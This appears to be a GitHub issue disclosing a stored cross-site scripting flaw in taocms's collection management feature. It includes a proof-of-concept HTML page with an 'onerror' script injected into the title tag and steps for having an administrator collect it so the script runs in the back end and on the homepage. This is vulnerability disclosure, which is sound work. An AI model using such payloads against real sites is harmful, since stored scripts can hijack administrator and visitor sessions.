taocms There is a storage type cross site scripting attack at “Collection management”(Column administrator authority)

There is a storage type cross site scripting attack at “Collection management”(Column administrator authority)

Open YUKIDD opened this issue 3 years ago • 0 comments

First, construct our POC and put it on our website, the url is http://test.com/id-1502.html. The POC is as follows:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta charset="utf-8">
  <title> Test title <img src=x onerror=alert(6)> </title>
</head>
<body>
    <span class="smalltxt">
      Testcontent-1
    </span>
    <div id="digit">
     Testcontent-2
    </div>
</body>
</html>

Then log in to the management background as an administrator, click Collection Management, enter the POC address we constructed, and click Start Collection: Snipaste_2021-12-03_13-03-13

When the page we constructed is collected, you can see the POC trigger： Snipaste_2021-12-03_13-03-39 On the homepage of the website, it can also trigger the POC ： Snipaste_2021-12-03_13-03-56

Dec 03 '21 05:12 YUKIDD

taocms taocms copied to clipboard

There is a storage type cross site scripting attack at “Collection management”(Column administrator authority)

taocms
taocms copied to clipboard